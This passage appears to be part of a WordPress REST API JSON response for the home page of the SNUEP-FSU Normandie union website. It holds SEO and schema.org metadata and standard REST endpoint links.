NORMANDIE","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/normandie.snuep.fr\/","og_locale":"fr_FR","og_type":"article","og_title":"Accueil - SNUEP-FSU NORMANDIE","og_url":"https:\/\/normandie.snuep.fr\/","og_site_name":"SNUEP-FSU NORMANDIE","article_modified_time":"2025-09-22T13:00:30+00:00","og_image":[{"width":1000,"height":380,"url":"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/cropped-tetiere_FB_828x315-academie-22.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/normandie.snuep.fr\/","url":"https:\/\/normandie.snuep.fr\/","name":"Accueil - SNUEP-FSU NORMANDIE","isPartOf":{"@id":"https:\/\/normandie.snuep.fr\/#website"},"datePublished":"2020-07-23T19:14:47+00:00","dateModified":"2025-09-22T13:00:30+00:00","breadcrumb":{"@id":"https:\/\/normandie.snuep.fr\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/normandie.snuep.fr\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/normandie.snuep.fr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/normandie.snuep.fr\/"},{"@type":"ListItem","position":2,"name":"Accueil"}]},{"@type":"WebSite","@id":"https:\/\/normandie.snuep.fr\/#website","url":"https:\/\/normandie.snuep.fr\/","name":"SNUEP-FSU NORMANDIE","description":"sa.normandie@snuep.fr","publisher":{"@id":"https:\/\/normandie.snuep.fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/normandie.snuep.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/normandie.snuep.fr\/#organization","name":"SNUEP-FSU NORMANDIE","url":"https:\/\/normandie.snuep.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/normandie.snuep.fr\/#\/schema\/logo\/image\/","url":"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/cropped-logo_snuep_fsu_ACADEMIE_tetiere_site_internet-22.jpg","contentUrl":"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/cropped-logo_snuep_fsu_ACADEMIE_tetiere_site_internet-22.jpg","width":1080,"height":228,"caption":"SNUEP-FSU NORMANDIE"},"image":{"@id":"https:\/\/normandie.snuep.fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=\/wp\/v2\/pages\/2","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2"}],"version-history":[{"count":13,"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":740,"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=\/wp\/v2\/pages\/2\/revisions\/740"}],"wp:attachment":[{"href":"https:\/\/normandie.snuep.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}